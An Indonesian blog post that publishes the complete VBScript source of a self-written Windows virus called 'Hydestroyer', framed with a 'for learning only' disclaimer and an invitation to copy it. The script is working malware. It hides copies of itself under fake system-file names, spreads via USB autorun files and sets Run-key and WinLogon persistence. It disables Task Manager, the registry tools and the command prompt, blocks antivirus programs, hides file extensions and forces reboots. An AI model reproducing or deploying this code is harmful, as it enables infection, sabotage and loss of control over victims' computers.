"Tulisan ini hanya bermaksud untuk pembelajaran,
Saya tidak bertanggung jawab atas segala penyalahgunaan dari script ini"
Script "VIRUS HYDESTROYER"
Virus yang saya buat ini (thn 2007an) bermula dari sebuah File Visual Basic Script yang saya temukan didalam flashdisk seorang teman.
Setelah saya pelajari, script pendek tersebut bermaksud untuk mengubah tulisan di program Internet Explorer.. Kalo gak salah begini tulisannya >> dajjal...... (saya lupa tulisan selanjutnya).
Lalu dengan bermodal regedit dan pengetahuan di vbs, saya mengubah script tersebut. Selanjutnya dengan sedikit trik dan utak atik, script file tersebut dapat bekerja sama dengan DOS file. Finally, Virus Hydestroyer dapat bekerja di sistem XP Normal maupun Safe Mode.
Inilah Script jadi dari VIRUS HYDESTROYER
'
'& & & & &&& &&&&&& &&&& &&&&&&& &&& &&& & & &&&&&& &&&
'& & & & & & & & & & & & & & & & & &
'& & & & & & & & & & & & & & & & & &
'&&&&&& & & & &&&& &&&& & & & & & & &&&& & &
'& & & & & & & & &&& & & & & &&&
'& & & & & & & & & & & & & & & &
'& & & &&& &&&&&& &&&&& & & & &&& & &&&&&& & &
'----------------------------------------------------------------------------------------
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
on error resume next
Rem My name is hydestroyer
Dim src, winpath, micpath, runpath, flashdrive, onkan, jalan, ext, txt, jpg, fs, mf, atr, tulis, task, gpedit, tf, rg, nt, batText, check, sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe desktop.ini.vbs"&vbcrlf&"____________________"&vbcrlf&"by hydestroyer"
txt = "Passing by...Passing by... Real World..."&vbcrlf&"running through without your Love"&vbcrlf&"running through without your Love"&vbcrlf&"running with >>> hydestroyer"
Desk = "[ExtShellFolderViews]"&vbcrlf&"{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}"&vbcrlf&"[{BE098140-A513-11D0-A3A4-00C04FD706EC}]"&vbcrlf&"Attributes=1"&vbcrlf&"IconArea_Image=.*.jpg"&vbcrlf&"IconArea_Text=0x00FFFFFF"&vbcrlf&"IconArea_TextBackground=0x00FF0665"&vbcrlf&"[.ShellClassInfo]"&vbcrlf&"ConfirmFileOp=0"
Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
Do: Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\NTUser.DAT.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\NTUser.DAT.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\NTUser.DAT.vbs"): tf.Attributes = 39
Set micpath = fs.getspecialfolder(0): Set tf = fs.getfile(micpath & "\Microsoft.NET\Tech.DAT.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(micpath & "\Microsoft.NET\Tech.DAT.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(micpath & "\Microsoft.NET\Tech.DAT.vbs"): tf.Attributes = 39
Set runpath = fs.getspecialfolder(0): Set tf = fs.getfile(runpath & "\system32\driverconfig.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(runpath & "\system32\driverconfig.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(runpath & "\system32\driverconfig.vbs"): tf.Attributes = 39
Set batpath = fs.getspecialfolder(0): Set tf = fs.getfile(batpath & "\driverconfig.vbs"): Set tf = fs.createtextfile(batpath & "\driverconfig.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(batpath & "\driverconfig.vbs")
Set tf = fs.getfile(winpath & "\ketikkan.doc"): Set tf = fs.createtextfile(winpath & "\ketikkan.doc", 2, True): tf.write txt: tf.Close: Set tf = fs.getfile(winpath & "\ketikkan.doc")
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1) Then
Set tf = fs.getfile(flashdrive.Path & "\desktop.ini.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\desktop.ini.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\desktop.ini.vbs"): tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\data.doc"): Set tf = fs.createtextfile(flashdrive.Path & "\data.doc", 2, True): tf.write txt: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\data.doc")
Set tf = fs.getfile(flashdrive.Path & "\desktop.ini"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\desktop.ini", 2, True): tf.write desk: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\desktop.ini"): tf.Attributes = 39
End If
on error resume next
If fs.FileExists(winpath & "\NTUser.DAT.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(runpath & "\system32\driverconfig.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(micpath & "\Microsoft.NET\Tech.DAT.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(winpath & "\ulangi.bat") = false Then
Set tulis = fs.CreateTextFile(winpath & "\ulangi.bat", True)
tulis.WriteLine("@echo off")
tulis.WriteLine("C:\Windows\System32\shutdown.exe -r -t 31")
tulis.Close
Set batText = fs.getfile(winpath & "\ulangi.bat", True)
End If
Next
Set rg = CreateObject("WScript.Shell")
rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",0,"REG_DWORD"
rg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "hydestroyer"
rg.regwrite "HKCR\vbsfile\DefaultIcon\", "%SystemRoot%\system32\SHELL32.dll,49"
rg.regwrite "HKEY_CLASSES_ROOT\Word.Document.8\", "hydestroyer files"
rg.regwrite "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon\", "C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe,1"
rg.regwrite "HKEY_CLASSES_ROOT\Excel.Sheet.8\", "hydestroyer files"
rg.regwrite "HKEY_CLASSES_ROOT\Excel.Sheet.8\DefaultIcon\", "C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe,1"
rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1", "AVG.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2", "cmd.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3", "kav8.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4", "Notepad.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5", "PCMAV-CLN.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6", "RamCleaner.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7", "RegCleaner.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",145,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",2,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallPaper",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\C-Media Wave",winpath & "\NTUser.DAT.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSOffice",micpath & "\Microsoft.NET\Tech.DAT.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winamp Wave",runpath & "\system32\driverconfig.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon\Shell", "Explorer.exe hydeless.bat"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "...hydestroyer...": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", ".*."
on error resume next
If fs.FileExists(winpath & "\hydestroyer.exe") = false Then
Set tulis = fs.CreateTextFile(winpath & "\converter.bat", True)
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo Welcome to hydestroyer homenet.hack")
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo off")
tulis.WriteLine("copy c:\windows\system32\wscript.exe c:\windows\wscript.exe")
tulis.WriteLine("ren c:\windows\wscript.exe hydestroyer.exe")
tulis.WriteLine("copy c:\windows\system32\wscript.exe c:\windows\wscript.exe")
tulis.WriteLine("ren c:\windows\wscript.exe svchost.exe")
tulis.WriteLine("c:\windows\hydestroyer.exe c:\windows\driverconfig.vbs")
tulis.WriteLine("c:\windows\svchost.exe c:\windows\driverconfig.vbs")
tulis.Close
Set batText = fs.getfile(winpath & "\converter.bat", True)
End If
on error resume next
If fs.FileExists(winpath & "\hydestroyer.exe") = false Then
Set jalan = Wscript.CreateObject("Wscript.Shell")
jalan.run(winpath & "\converter.bat")
End If
on error resume next
If fs.FileExists(winpath & "\hydeless.bat") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\ulangi.bat")
End If
on error resume next
If fs.FileExists(winpath & "\hydeless.bat") = false Then
Set tulis = fs.CreateTextFile(winpath & "\hydeless.bat", True)
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo Welcome to hydestroyer homenet.hack")
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo off")
tulis.WriteLine("c:\windows\hydestroyer.exe c:\windows\driverconfig.vbs")
tulis.WriteLine("c:\windows\svchost.exe c:\windows\driverconfig.vbs")
tulis.Close
Set batText = fs.getfile(winpath & "\hydeless.bat", True)
End If
If check <> 1 Then Wscript.sleep 0
Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Silakan Di Copy untuk dipelajari,
Saya akan sangat berterima kasih akan komentar anda, baik itu kritikan dan masukkan.
"Tulisan ini hanya bermaksud untuk pembelajaran,
Saya tidak bertanggung jawab atas segala penyalahgunaan dari script ini"
Apakah mayat berjalan Toraja tertangkap kamera?
7 tahun yang lalu
Tidak ada komentar:
Posting Komentar